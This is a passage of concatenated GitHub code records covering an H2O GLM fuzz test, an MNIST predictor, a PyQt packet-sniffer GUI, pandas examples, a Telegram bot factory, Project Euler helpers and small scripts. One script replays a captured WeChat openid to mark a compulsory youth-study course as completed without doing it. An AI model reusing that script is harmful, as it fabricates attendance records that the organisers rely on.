False][cointoss()]\n # beta constraints\n if cointoss():\n bc = []\n for n in x:\n if train[n].isnumeric()[0]:\n name = train.names[n]\n lower_bound = random.uniform(-1, 1)\n upper_bound = lower_bound + random.random()\n bc.append([name, lower_bound, upper_bound])\n if len(bc) > 0:\n beta_constraints = h2o.H2OFrame(bc)\n beta_constraints.set_names([\"names\", \"lower_bounds\", \"upper_bounds\"])\n kwargs[\"beta_constraints\"] = beta_constraints\n\n # display the parameters and their corresponding values\n print(\"-----------------------\")\n print(\"x: {0}\".format(x))\n print(\"y: {0}\".format(y))\n print(\"validation: {0}\".format(do_validation))\n for k, v in kwargs.items():\n if k == \"beta_constraints\":\n print(k + \": \")\n beta_constraints.show()\n else:\n print(k + \": {0}\".format(v))\n if do_validation:\n # h2o.glm(x=train[x], y=train[y], validation_x=valid[x], validation_y=valid[y], **kwargs)\n H2OGeneralizedLinearEstimator(**kwargs).train(x=x, y=y, training_frame=train, validation_frame=valid)\n else:\n # h2o.glm(x=train[x], y=train[y], **kwargs)\n H2OGeneralizedLinearEstimator(**kwargs).train(x=x, y=y, training_frame=train)\n print(\"-----------------------\")\n\n print(\"Import and data munging...\")\n seed = 
random.randint(1, 10000)\n    print(\"SEED: {0}\".format(seed))\n    pros = h2o.upload_file(pyunit_utils.locate(\"smalldata/prostate/prostate.csv.zip\"))\n    pros[1] = pros[1].asfactor()\n    r = pros[0].runif(seed=seed) # a column of length pros.nrow with values between 0 and 1\n    # ~80/20 train/validation split\n    pros_train = pros[r > .2]\n    pros_valid = pros[r <= .2]\n\n    cars = h2o.upload_file(pyunit_utils.locate(\"smalldata/junit/cars.csv\"))\n    r = cars[0].runif(seed=seed)\n    cars_train = cars[r > .2]\n    cars_valid = cars[r <= .2]\n\n    print()\n    print(\"======================================================================\")\n    print(\"============================== Binomial ==============================\")\n    print(\"======================================================================\")\n    for i in range(10):\n        attack(\"binomial\", pros_train, pros_valid, random.sample([2, 3, 4, 5, 6, 7, 8], random.randint(1, 7)), 1)\n\n    print()\n    print(\"======================================================================\")\n    print(\"============================== Gaussian ==============================\")\n    print(\"======================================================================\")\n    for i in range(10):\n        attack(\"gaussian\", cars_train, cars_valid, random.sample([2, 3, 4, 5, 6, 7], random.randint(1, 6)), 1)\n\n    print()\n    print(\"======================================================================\")\n    print(\"============================== Poisson ==============================\")\n    print(\"======================================================================\")\n    for i in range(10):\n        attack(\"poisson\", cars_train, cars_valid, random.sample([1, 3, 4, 5, 6, 7], random.randint(1, 6)), 2)\n\n    print()\n    print(\"======================================================================\")\n    print(\"============================== Gamma ==============================\")\n    print(\"======================================================================\")\n    for i in range(10):\n        attack(\"gamma\", pros_train, pros_valid, random.sample([1, 2, 3, 5, 6, 7, 8], random.randint(1, 7)), 4)\n\n\n\nif __name__ == \"__main__\":\n    pyunit_utils.standalone_test(random_attack)\nelse:\n    random_attack()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_algos/glm/pyunit_random_attack_medium.py","file_name":"pyunit_random_attack_medium.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"32431497014","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 14 00:08:43 2020\n'''\npython 3.7\ntensorflow 2.1\npillow(PIL) 4.3.0\n\nCode reference: https://github.com/geektutu/tensorflow-tutorial-samples\n\n\n\"\"\"\n\nfrom PIL import Image\nimport numpy as np\n\nfrom mnist_cnn import CNN\n\nclass Predict(object):\n    def __init__(self):\n#        latest = tf.train.latest_checkpoint('./ckpt')\n        self.network = CNN()\n        # restore the network weights\n        #self.network.model.load_weights(latest)\n        self.network.model.load_weights('./ckpt/cp-0004.ckpt')\n\n    def predict(self, image_path):\n        # read the image in grayscale\n        img = Image.open(image_path).convert('L')\n        flatten_img = np.reshape(img, (28, 28, 1))\n        x = np.array([1 - flatten_img ])\n#        print(x)\n\n        # API refer: https://keras.io/models/model/\n        y = self.network.model.predict(x)\n\n        # x holds a single image, so y[0] is its prediction\n        # np.argmax() returns the index of the largest value, i.e. the predicted digit\n        print(image_path)\n        print(y[0],' -> predicted digit:', np.argmax(y[0]))\n\n\nif __name__ == \"__main__\":\n    app = Predict()\n    app.predict('./test_images/0_57.png')\n    
app.predict('./test_images/1_32.png')\n app.predict('./test_images/3_59.png')\n","repo_name":"yhily/deep-learning-resource","sub_path":"srcs/chap07/7-5/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"43144195990","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\n\nfrom Threads.Cap_Thread import capturethread\nfrom Data import saveQueue\nfrom Tools import scapy2ordereddict\n\n\nclass capture(QWidget):\n filterApplied = pyqtSignal()\n def __init__(self):\n super().__init__()\n self.initUI()\n self.packet_list = []\n\n def initUI(self):\n mainLayout = QVBoxLayout(self)\n\n filter_layout = QHBoxLayout()\n filter_label = QLabel('Filter')\n self.filter_lineEdit = QLineEdit()\n filter_apply_btn = QPushButton('Apply')\n filter_layout.addWidget(filter_label)\n filter_layout.addWidget(self.filter_lineEdit)\n filter_layout.addWidget(filter_apply_btn)\n mainLayout.addLayout(filter_layout)\n self.filter = ''\n\n splitterMain = QSplitter(Qt.Vertical, self)\n self.QuickView = QTableWidget(splitterMain)\n self.QuickView.setColumnCount(6)\n self.QuickView.setHorizontalHeaderLabels(['번호', '시간', 'Source', 'Destination', 'Protocol', '크기'])\n self.QuickView.setColumnWidth(0, 60)\n self.QuickView.verticalHeader().setVisible(False)\n #데이터 길이에 따라 테이블 길이 변경\n self.QuickView.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)\n self.QuickView.setShowGrid(False)\n self.QuickView.setSelectionBehavior(QAbstractItemView.SelectRows)\n self.QuickView.setSelectionMode(QTableWidget.ExtendedSelection)\n # 테이블 수정 불가능하게 설정\n self.QuickView.setEditTriggers(QAbstractItemView.NoEditTriggers)\n # 테이블 정렬기능\n self.QuickView.setSortingEnabled(True)\n\n self.DetailView = QTreeWidget(splitterMain)\n self.DetailView.setColumnCount(2)\n self.DetailView.setHeaderLabels(['Item', 'Detail'])\n mainLayout.addWidget(splitterMain)\n\n bottomLayout = QHBoxLayout()\n self.start_btn = QPushButton('START')\n self.stop_btn = QPushButton('STOP')\n self.restart_btn = QPushButton('Restart')\n self.clear_btn = QPushButton('CLEAR')\n bottomLayout.addWidget(self.start_btn)\n bottomLayout.addWidget(self.stop_btn)\n bottomLayout.addWidget(self.restart_btn)\n bottomLayout.addWidget(self.clear_btn)\n bottomLayout.addStretch()\n self.stop_btn.setEnabled(False)\n self.restart_btn.setEnabled(False)\n mainLayout.addLayout(bottomLayout)\n\n self.start_btn.clicked.connect(self.start_sniff)\n \n self.stop_btn.clicked.connect(self.stop_sniff)\n self.QuickView.currentItemChanged.connect(self.show_current_detail)\n self.restart_btn.clicked.connect(self.restart_sniff)\n self.clear_btn.clicked.connect(self.clear_widget)\n self.count = 0\n\n def start_sniff(self):\n self.cap_thread = capturethread()\n self.cap_thread.newPkt.connect(self.init_display)\n self.cap_thread.start()\n\n self.start_btn.setEnabled(False)\n self.stop_btn.setEnabled(True)\n self.restart_btn.setEnabled(False)\n\n def init_display(self, item_list,pkt):\n self.packet_list.append(pkt)\n self.QuickView.insertRow(self.QuickView.rowCount())\n\n for i in range(6):\n self.QuickView.setItem(self.QuickView.rowCount()-1, i, item_list[i])\n\n def buildTree(self):\n self.DetailView.clear()\n\n for title in self.packetDict.keys():\n tree_item = QTreeWidgetItem(self.DetailView)\n tree_item.setText(0, title)\n tree_item.setExpanded(True)\n detail_dic = self.packetDict[title]\n\n for i in detail_dic.keys():\n leaf = QTreeWidgetItem(tree_item, 
[i, str(detail_dic[i])])\n                leaf.setToolTip(1,str(detail_dic[i]))\n                tree_item.addChild(leaf)\n\n            self.DetailView.addTopLevelItem(tree_item)\n\n    def stop_sniff(self):\n        self.cap_thread.set_stopper(True)\n        self.start_btn.setEnabled(True)\n        self.restart_btn.setEnabled(True)\n        self.stop_btn.setEnabled(False)\n\n    def restart_sniff(self):\n        self.pkt_queue = saveQueue.get_pkt()\n        self.label_queue = saveQueue.get_label()\n        with self.label_queue.mutex:\n            self.label_queue.queue.clear()\n        with self.pkt_queue.mutex:\n            self.pkt_queue.queue.clear()\n\n        self.packet_list.clear()\n        self.QuickView.clearContents()\n        self.DetailView.clear()\n        self.start_sniff()\n\n    def show_current_detail(self):\n        if self.packet_list:\n            pkt = self.packet_list[self.QuickView.currentRow()]\n            self.packetDict = scapy2ordereddict.to_dict(pkt)\n            self.buildTree()\n\n    def clear_widget(self):\n        self.pkt_queue = saveQueue.get_pkt()\n        self.label_queue = saveQueue.get_label()\n        with self.label_queue.mutex:\n            self.label_queue.queue.clear()\n        with self.pkt_queue.mutex:\n            self.pkt_queue.queue.clear()\n\n        self.packet_list.clear()\n        self.QuickView.clearContents()\n        self.DetailView.clear()\n\nclass FakeOut:\n    def __init__(self):\n        self.str = ''\n\n    def write(self, s):\n        self.str += s\n\n    def show(self):\n        print(self.str)","repo_name":"danflanf/Computer_network","sub_path":"packet_sniff_program4/Widgets/Capture_Packet.py","file_name":"Capture_Packet.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40954003498","text":"\"\"\"\n\n- We can add dictionaries and lists to DataFrame\n- If you need help you can type dir(df1)\n- df1.<> is a DataFrame which contains almost the same methods as \"pandas.DataFrame\"\n\n\"\"\"\nimport pandas\n\ndata_df1 = []\ndata_df1.append([\"COD01\", \"John\", 26, \"\"])\ndata_df1.append([\"COD02\", \"Jane\", 28, \"\"])\ndata_df1.append([\"COD03\", \"Paul\", 45, \"\"])\ndata_df1.append([\"COD04\", \"Nana\", 23, \"\"])\ndata_df1.append([\"COD05\", \"Jeff\", 35, \"\"])\ndata_df1.append([\"COD06\", \"Alan\", 52, \"\"])\n\ndf1 = pandas.DataFrame(data_df1, columns=[\"ID\", \"Name\", \"Age\", \"Category\"])\n\n\"\"\"\n\nIt is possible to define if conditions to generate column values\n\n\"\"\"\ndf1.loc[df1.Age >= 30, \"Category\"] = \"Mature\"\ndf1.loc[df1.Age < 30, \"Category\"] = \"Young\"\ndf1.loc[df1.Age >= 50, \"Category\"] = \"Old\"\n\n\"\"\"\nSet the column 'ID' as the index\n\"\"\"\ndf1 = df1.set_index(\"ID\")\n\n\"\"\"\n\nI can also create ranges for unique indexes.\nIn this case, from ID COD02 to COD04. \nBringing only from field 'Age' to 'Category'\n\n\"\"\"\ndf1 = df1.loc[\"COD02\":\"COD04\",\"Age\":\"Category\"]\n\n\"\"\"\nAnd restrict for attributes. In this case, where Age < 45\n\"\"\"\ndf1 = df1.loc[df1.Age < 45]\n\ndata_df2 = []\ndata_df2.append({\"Profession\": \"Programmer\", \"Salary\": 50000})\ndata_df2.append({\"Profession\": \"Engineer\", \"Salary\": 70000})\ndata_df2.append({\"Profession\": \"Lawyer\", \"Salary\": 65000})\ndata_df2.append({\"Profession\": \"Carpenter\", \"Salary\": 40000})\ndata_df2.append({\"Profession\": \"Waitress\", \"Salary\": 35000})\n\ndf2 = pandas.DataFrame(data_df2, columns=[\"Profession\", \"Salary\"])\n\n\"\"\"\nIt is possible to filter results. 
I.e: Get salaries > 40000\n\"\"\"\ndf2 = df2[df2.Salary > 40000]\n\n\"\"\"\nIt is also possible to get objects by specific position index and column ranges\n\"\"\"\ndf1_index = pandas.DataFrame(data_df1, columns=[\"ID\", \"Name\", \"Age\", \"Category\"])\ndf1_index = df1_index.iloc[3, 1:3]\nprint(df1_index)\n\n\"\"\"\n\nAnd get values from specific index positions and fields\n\n\"\"\"\ndf1_index_value = pandas.DataFrame(data_df1, columns=[\"ID\", \"Name\", \"Age\", \"Category\"])\ndf1_index_value = df1_index_value.loc[3, \"Name\"]\nprint(df1_index_value)\n\nprint(df1)\nprint(\"\\nMean age is %2.2f\" % df1.Age.mean())\nprint(\"Max age is %2.2f\" % df1.Age.max())\nprint(\"Min age is %2.2f\" % df1.Age.min())\nprint(df2)\nprint(\"\\nMean salary is $%2.2f\" % df2.Salary.mean())\nprint(\"Max salary is $%2.2f\" % df2.Salary.max())\nprint(\"Min salary is $%2.2f\" % df2.Salary.min())\n\n\"\"\"\n\nIt is possible to drop columns by name\n\n\"\"\"\ndf1_2 = pandas.DataFrame(data_df1, columns=[\"ID\", \"Name\", \"Age\", \"Category\"])\ndf1_2.drop(\"Category\",1)\n\n\"\"\"\n\nIt is possible to drop rows by index\n\n\"\"\"\ndf1_3 = pandas.DataFrame(data_df1, columns=[\"ID\", \"Name\", \"Age\", \"Category\"])\ndf1_3 = df1_3.set_index(\"ID\")\ndf1_3.drop(\"COD01\",0)\n\n\"\"\"\n\nIt is possible to drop rows by index positions ranges\n\n\"\"\"\ndf1_4 = pandas.DataFrame(data_df1, columns=[\"ID\", \"Name\", \"Age\", \"Category\"])\ndf1_4 = df1_4.set_index(\"ID\")\ndf1_4.drop(df1_4.index[0:3],0)\n\n\"\"\"\n\nIt is possible to drop columns by index positions ranges\n\n\"\"\"\ndf1_5 = pandas.DataFrame(data_df1, columns=[\"ID\", \"Name\", \"Age\", \"Category\"])\ndf1_5.drop(df1_5.columns[2:4],1)\n\n\"\"\"\nIt is possible to load data in many formats\n\"\"\"\ndf3 = pandas.read_json(\"supermarkets.json\")\ndf4 = pandas.read_csv(\"supermarkets.csv\")\ndf5 = pandas.read_excel(\"supermarkets.xlsx\", sheet_name=0)\ndf6 = pandas.read_csv(\"supermarkets-commas.txt\")\ndf7 = pandas.read_csv(\"supermarkets-semi-colons.txt\", sep=\";\")\n\n\"\"\"\n\nAdd new column 'Continent' for the DataFrame with default value 'North America'\n\n\"\"\"\ndf5_total_columns = df5.shape[0]\ndf5[\"Continent\"] = df5_total_columns*[\"North America\"]\n\n\"\"\"\n\nUpdate column value for each row\n\n\"\"\"\ndf5[\"Continent\"] = df5[\"Country\"] + \", \" + df5[\"Continent\"]\n\n\"\"\"\n\nAdd a new row for DataFrame\n\n\"\"\"\nnew_id = 7\ndf5 = df5.set_index(\"ID\")\ndf5_t = df5.T\ndf5_t[new_id] = [\"Center\", \"Florianopolis\", \"Santa Catarian\", \"Brazil\", \"Bistek\", 700]\ndf5 = df5_t.T","repo_name":"gabrielfs7/python-tests","sub_path":"data_analysis/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43199244210","text":"from aiogram import Dispatcher, Bot\nfrom deta import Deta\n\nfrom example_bot.bot.handlers.form import form_router\n\n\ndef create_dispatcher(deta: Deta) -> Dispatcher:\n    storage = DetaStorage(deta_base=deta.AsyncBase(\"fsm\"))\n    dispatcher = Dispatcher(storage=storage)\n\n    for router in [\n        form_router,\n        echo_router,\n    ]:\n        dispatcher.include_router(router)\n\n    return dispatcher\n\n\ndef create_bot(token: str) -> Bot:\n    return Bot(token=token, 
parse_mode=\"HTML\")\n","repo_name":"danilminer234/openai1","sub_path":"example_bot/bot/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31231019891","text":"import time\nfrom typing import Any\nimport requests\n\n\nclass ZheJiang():\n\n \"\"\"A Class for the completion of Zhejiang Youth University Study\"\"\"\n\n def __init__(self, nid, cardNo, openid, SendKey: str = None):\n \"\"\"\n description: init the class\n :param nid: 团组织编号, 形如N003************\n :param cardNo: 打卡昵称, 可能为学号, 也可能为姓名\n :param openid: 微信openid\n :param SendKey: Server酱的SendKey\n\n all params are required except SendKey, all params are need to capture from the network\n \"\"\"\n self.nid = nid\n self.cardNo = cardNo\n self.openid = openid\n self.SendKey = SendKey\n self.session = requests.session()\n self.access_token = self.getAccessToken()\n time.sleep(5)\n self.current_course = self.getCurrentCourse()\n time.sleep(5)\n self.result = None\n self.msg = None\n\n\n def __call__(self, *args: Any, **kwds: Any) -> Any:\n \"\"\"\n description: call the class\n :param args: args\n :param kwds: kwds\n :return: True if success, False if failed\n \"\"\"\n self.sign()\n \n\n def getAccessToken(self) -> str:\n \"\"\"\n description: get the access_token\n :return: access_token\n \"\"\"\n time_stamp = str(int(time.time())) # 获取时间戳\n url = \"https://qczj.h5yunban.com/qczj-youth-learning/cgi-bin/login/we-chat/callback?callback=https%3A%2F%2Fqczj\" \\\n \".h5yunban.com%2Fqczj-youth-learning%2Findex.php&scope=snsapi_userinfo&appid=wx56b888a1409a2920&openid=\" + \\\n self.openid + \"&nickname=ZhangSan&headimg=&time=\" + time_stamp + \"&source=common&sign=&t=\" + time_stamp\n \n res = self.session.get(url)\n access_token = res.text[45:81]\n print(\"获取到AccessToken:\", access_token)\n return access_token\n \n \n def getCurrentCourse(self):\n \"\"\"\n description: get the current course\n :return: current course\n \"\"\"\n url = \"https://qczj.h5yunban.com/qczj-youth-learning/cgi-bin/common-api/course/current?accessToken=\" + self.access_token\n res = self.session.get(url)\n if (res.status_code == 200): # 验证正常\n print(\"获取到最新课程代号:\", res.json()[\"result\"][\"id\"])\n return res.json()[\"result\"][\"id\"]\n else:\n print(\"获取最新课程失败!\")\n print(res.text)\n return False\n \n\n def sign(self):\n \"\"\"\n description: sign the current course\n :return: True if success, False if failed\n \"\"\"\n data = {\n \"course\": self.current_course,\n \"subOrg\": None,\n \"nid\": self.nid,\n \"cardNo\": self.cardNo\n }\n url = \"https://qczj.h5yunban.com/qczj-youth-learning/cgi-bin/user-api/course/join?accessToken=\" + self.access_token\n res = self.session.post(url, json=data)\n status = int(res.json()[\"status\"])\n self.msg = res.json()[\"message\"]\n print(res.text)\n if (res.status_code == 200 and status == 200):\n self.result = True\n else:\n self.result = False\n \n \n","repo_name":"IamK77/Youth_Study","sub_path":"youth_study_py/zhejiang.py","file_name":"zhejiang.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16149976171","text":"import cv2\nimport glob\nimport os\nfrom tqdm import tqdm\nimport natsort\nfrom PIL import Image\nimport img2pdf\n\ninput_dir = 'Images'\nos.mkdir('Cropped')\n\ni = 0\n\n#orginal shape 1366x768\nimages = []\nprint(\"Sortowanie...\")\nfor img in tqdm(glob.glob(input_dir + 
\"/*.png\")):\n images.append(img)\n\nimages_sorted = natsort.natsorted(images,reverse=False)\n\n\nprint(\"Obcinanie...\")\n\nfor img in tqdm(images_sorted):\n image = cv2.imread(img)\n imgCropped = image[0:800, 430:910]\n cv2.imwrite(\"Cropped/image%0i.png\" %i, imgCropped)\n i +=1\n #cv2.imshow('image',imgCropped)\n \n\n cv2.waitKey(30)\ncv2.destroyAllWindows()\n\ndef generate_pdf():\n t = os.listdir('.')\n\n t = natsort.natsorted(t,reverse=False)\n\n with open(\"book.pdf\", \"wb\") as f:\n f.write(img2pdf.convert([i for i in tqdm(t) if i.endswith(\".png\")]))\n\nos.chdir('Cropped')\ngenerate_pdf()\nprint(\"Utworzono PDF\")\n\n","repo_name":"arczi0/Cropp-make-PDF","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23451881641","text":"file = 'A-large.in.txt'\n\ndef parameters(textfile):\n file = open(textfile, 'r')\n curr_line = file.readline()\n curr_line = file.readline()\n wanted_list = []\n \n while curr_line != '':\n most_shy, dist = curr_line.split(' ')\n \n wanted_list = wanted_list + [[most_shy, str(dist)[:-1]]]\n\n curr_line = file.readline()\n \n\n return wanted_list\n\n##print(parameters(file))\n\ndef get_most_shy(lst):\n return lst[0]\n\ndef get_dist(lst):\n return lst[1]\n\ndef number(lst):\n output = open('GCJ Ovation Answer.txt', 'w')\n\n for index, element in enumerate(lst):\n extra = 0\n total_stand = 0\n dist = get_dist(element)\n \n for s in range(len(dist)):\n if total_stand >= s:\n total_stand += int(dist[s])\n \n else:\n extra += (s - total_stand)\n total_stand += int(dist[s]) + (s - total_stand)\n\n \n\n output.write((\"Case #%d: %d\" % (index + 1,extra) +'\\n'))\n\n \nnumber(parameters(file))\n\n\n \n\n\n\n\n \n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/2382.py","file_name":"2382.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34423495876","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 03 23:50:56 2014\n\n@author: aaditya prakash\n\"\"\"\nfrom __future__ import division\nimport re\nimport numpy as np\nfrom itertools import permutations \nimport math\nfrom functools import reduce\nfrom fractions import Fraction\nfrom collections import defaultdict\nfrom itertools import count\nfrom operator import mul\n\ndef is_square(i):\n x = i // 2\n seen = set([x])\n while x * x != i:\n x = (x + (i // x) ) // 2\n if x in seen: return False\n seen.add(x)\n return True\n\ndef Fibonacci():\n \"\"\" generator function to generate infinite values of fib series \"\"\"\n a,b = 0,1\n yield a\n yield b\n while True:\n a, b = b, a + b\n yield b\n\n\ndef generate_cube(start):\n \"\"\" yields cubes starting from start^3\"\"\"\n while True:\n yield start**3\n start += 1\n\ndef isPrime(n):\n \"\"\" returns true if given number is prime, false otherwise \"\"\"\n if(n < 2): return False \n for i in range(2,int(n**0.5)+1):\n if n%i==0:\n return False\n\n return True\n\ndef isPrimeFast(n):\n \"\"\"\"precondition n is a nonnegative integer postcondition: return True if n is prime and False otherwise.\"\"\"\n if n < 2:\n return False;\n if n % 2 == 0:\n # return False\n return n == 2\n k = 3\n while k*k <= n:\n if n % k == 0:\n return False\n k += 2\n return True\n\ndef Prime(number=2):\n \"\"\" generator function to generate infinite values of prime numbers starting from 'number' \"\"\"\n while 
True:\n        if isPrimeFast(number):\n            yield number\n        number += 1\n\ndef PrimeReverse(number):\n    \"\"\" generator function to generate infinite values of prime numbers starting from 'number' but going lower \"\"\"\n    while True:\n        if number < 2:\n            yield 2\n        elif isPrimeFast(number):\n            yield number\n        number -= 1\n\ndef PrimeList(number):\n    \"\"\" return a list of all the prime numbers less than the given 'number' \"\"\"\n    iterPrime = Prime(2)\n    primeList = []\n    nextPrime = iterPrime.next()\n    while nextPrime < number:\n        primeList.append(nextPrime)\n        nextPrime = iterPrime.next()\n    return primeList\n\ndef PrimeRange(start, end):\n    \"\"\" return a list of all the prime numbers in the range start to end (not inclusive)\"\"\"\n    iterPrime = Prime(start)\n    primeList = []\n    nextPrime = iterPrime.next()\n    while nextPrime < end:\n        primeList.append(nextPrime)\n        nextPrime = iterPrime.next()\n    return primeList\n\ndef NthPrime(number):\n    \"\"\" returns the nth prime number, where 'n' = number. 2 is first prime \"\"\"\n    iterPrime = Prime(2)\n    for i in range(number):\n        nextPrime = iterPrime.next()\n    return nextPrime\n    \nprimes_cache, prime_jumps = [], defaultdict(list)\ndef primes():\n    prime = 1\n    for i in count():\n        if i < len(primes_cache): prime = primes_cache[i]\n        else:\n            prime += 1\n            while prime in prime_jumps:\n                for skip in prime_jumps[prime]:\n                    prime_jumps[prime + skip] += [skip]\n                del prime_jumps[prime]\n                prime += 1\n            prime_jumps[prime + prime] += [prime]\n            primes_cache.append(prime)\n        yield prime\n\ndef factorize(n):\n    for prime in primes():\n        if prime > n: return\n        exponent = 0\n        while n % prime == 0:\n            exponent, n = exponent + 1, n / prime\n        if exponent != 0:\n            yield prime, exponent\n\n\ndef totient(n):\n    return reduce(mul, ((p-1) * p ** (exp-1) for p, exp in factorize(n)), 1)\n\ndef IsPalindrome(s):\n    \"\"\" Checks if the given string 's' is palindrome \"\"\"\n    return s==s[::-1]\n    \ndef IsPalindromeInt(n):\n    \"\"\" ABANDONED, as it turns out that converting to string and checking palindrome is faster than using modulo. 
checks if the given integer is palindrome, does not use string conversion \"\"\"\n    return IsPalindrome(str(n))\n    \n\ndef Palindrome(number):\n    \"\"\" generator function to generate infinite palindrome larger than given number \"\"\"\n    while True:\n        if IsPalindrome(number):\n            yield number\n        number += 1\n\ndef PalindromeReverse(number):\n    \"\"\" generator function to generate infinite palindrome smaller than given number in reverse \"\"\"\n    while True:\n        if number < 1:\n            yield 1\n        elif IsPalindromeInt(number):\n            yield number\n        number -= 1\n\ndef LargestFactor(number, parameter):\n    \"\"\" Returns largest Factor of 'number' smaller than 'parameter' \"\"\"\n    parameter -= 1\n    while parameter > 0:\n        if(number % parameter == 0):\n            return parameter\n        parameter -= 1\n\ndef PrimeFactors(dictPrime, number):\n    \"\"\" Returns the prime factors of the given 'number',\n    assumes a dict with all prime numbers less than 'number' as key\n    updates this dictionary with count of every prime factor \"\"\"\n    d = 2\n    while d*d <= number:\n        while (number % d) == 0:\n            # this inner loop handles multiple entries of the same prime factor\n            dictPrime[d] += 1\n            number /= d\n        d += 1\n    if number > 1:\n        dictPrime[number] += 1\n    return dictPrime\n    \ndef AllFactors(number):\n    \"\"\" Returns all the factors of the given number, very efficient code \n    returns SET and is not necessarily monotonic\"\"\"\n    return set(reduce(list.__add__, \n                ([i, number//i] for i in range(1, int(number**0.5) + 1) if number % i == 0)))\n\ndef PrimeFactorsSet(number):\n    \"\"\" Returns all the prime factors of the given number\n    returns SET and is not necessarily monotonic\"\"\"\n    #return set(reduce(list.__add__,\n    #            ([i, number] for i in range(1, int(number**0.5) + 1) if number % i == 0 )))\n    return set( i for i in range(1, int(number//2) + 1) if number % i == 0 and isPrimeFast(i))\n\ndef NumberOfPrimeFactors(number):\n    lenP = 0\n    for i in range(1, int(number//2) + 1):\n        if number % i == 0 and isPrimeFast(i):\n            lenP +=1\n    return lenP\n\ndef TriangleNumber(number):\n    \"\"\" Generator Function to generate Triangle Numbers starting from 'number' \"\"\"\n    while True:\n        yield number*(number+1)/2\n        number += 1\n    \ndef LengthCollatz(number):\n    \"\"\" Returns the length of the collatz sequence of given 'number' \"\"\"\n    leng = 1\n    while True:\n        if(number<=1):\n            return leng\n        elif(number%2==0): \n            number /= 2\n        else:\n            number = 3*number + 1\n        leng += 1\n\ndef SumDigits_slow(Number):\n    \"\"\" Returns the sum of the digits of a given number \"\"\"\n    return sum(map(int, str(Number)))\n\ndef GetDigits(n):\n    \"\"\" returns the digits in a list, uses only integer operations\"\"\"\n    d = []\n    while n:\n        d.append(n%10)\n        n //= 10\n    return d[::-1]\n\ndef SumDigits(n):\n    \"\"\" returns the sum of the digits, (only integer operation) source StackOverflow \"\"\"\n    r = 0\n    while n:\n        r,n = r + n%10, n // 10\n    return r\n\n    \ndef NumberToWord(Number):\n    \"\"\" Returns the given number in Word. 
Number < 100 assumed \"\"\"\n dicWord = {1:'one', 2:'two', 3:'three',4:'four',5:'five',\n 6:'six', 7:'seven',8:'eight',9:'nine', 10:'ten', 11:'eleven',\n 12:'twelve', 13:'thirteen', 14:'fourteen', 15:'fifteen', 16:'sixteen',\n 17:'seventeen', 18:'eighteen', 19:'nineteen',\n 20:'twenty', 30:'thirty', 40:'forty', 50:'fifty', 60:'sixty',\n 70:'seventy', 80:'eighty',90:'ninety'}\n if(Number in dicWord or Number <= 20): return dicWord[Number] \n return dicWord[(Number//10)*10] + dicWord[(Number % 10)]\n \ndef IsAbundant(number):\n \"\"\" Returns true if the given 'number' is abundant\n i.e sum of all its factors is > number \"\"\"\n sumAllFactors = sum(list(sorted(AllFactors(number)))[:-1])\n return sumAllFactors > number\n \ndef Abundant(number=1):\n \"\"\" generator function to generate infinite values of abundant numbers starting from 'number' \"\"\"\n while True:\n if IsAbundant(number):\n yield number\n number += 1\n\ndef Longest_Repeating_Sub_String(strIn):\n largest = ''\n i = 1\n \n while 1:\n m = re.search(\"(\" + (\"\\w\" * i) + \").*\\\\1.*\\\\1\", strIn)\n if not m:\n break\n largest = m.group(1)\n i += 1\n return largest\n \ndef Length_Recurring_Cycle(nu, de):\n \"\"\" Returns the length of recurring decimal cycle for the fraction\n 'nu(merator)'/'de(nominator)' \"\"\"\n \n x = 10 * nu % de\n count = 0\n y=x\n for c in xrange(de):\n y = 10*y % de\n count += 1\n if(y == x):\n return count\n return 0\n \ndef Make_Spiral_Matrix(n):\n \"\"\" Retuns a Spiral Matrix, of NxN, puts values starting at 1 from\n the center and moves to right clockwise \"\"\"\n dx,dy = 1,0 # Starting increments\n x,y = 0,0 # Starting location\n myarray = [[None]* n for j in range(n)]\n for i in range(n**2, 0, -1):\n myarray[x][y] = i\n nx,ny = x+dx, y+dy\n if 0<=nx= 1: return 1\n \n return Linear_Combinations(S, n, m-1) + Linear_Combinations(S, n-S[m], m)\n \ndef Reduce_Fraction(num, den):\n \"\"\" ** USE fractions.Fraction instead **\n Returns the reduced form of the given fraction as 'num' and 'den' \n assumes num <= den\n \"\"\"\n \n newNum = num\n newDen = den\n numFactors = sorted(AllFactors(num), reverse=True)[:-1]\n #print(numFactors)\n for i in range(len(numFactors)):\n f = numFactors[i]\n if (newDen % f == 0 and newNum % f == 0):\n #print 'Before: ' , newNum, newDen, f \n newNum //= f\n newDen //= f\n #print 'After: ' , newNum, newDen, f \n return newNum, newDen\n \ndef IsCircularPrime(num):\n \"\"\" Checks if the given number is circular prime\n - all combinations of given number is prime \"\"\"\n \n a = str(num)\n n = len(a)\n\n llC = [[a[i - j] for i in range(n)] for j in range(n)]\n \n for l in llC:\n lNum = int(''.join(l))\n if(not isPrimeFast(lNum)): return False \n return True\n \ndef Eratosthenes():\n\t'''Yields the sequence of prime 